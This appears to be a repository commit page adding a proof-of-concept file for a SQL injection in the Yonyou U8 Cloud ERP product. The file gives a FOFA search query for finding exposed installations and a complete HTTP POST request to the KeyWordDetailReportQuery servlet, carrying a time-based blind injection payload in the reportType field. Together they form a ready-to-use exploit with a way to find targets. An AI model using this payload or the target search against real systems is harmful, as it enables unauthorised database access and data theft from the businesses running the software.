admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞.md

Browse Source
This commit is contained in:
wy876 2024-01-01 13:43:08 +08:00 committed by GitHub
parent 1508806444
commit eee279df55
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 16 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞.md Normal file
View File

@ -0,0 +1,16 @@
# 用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞
## fofa
```
app="用友U8 Cloud"
```
## poc
```
POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery HTTP/1.1
host:127.0.0.1
{"reportType":"';WAITFOR DELAY '0:0:5'--","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]}
```
![19d957a16fb12f9edddbd99a2dbd081a](https://github.com/wy876/POC/assets/139549762/dfc8e10e-b1f8-41db-8dd2-e23c5c47b249)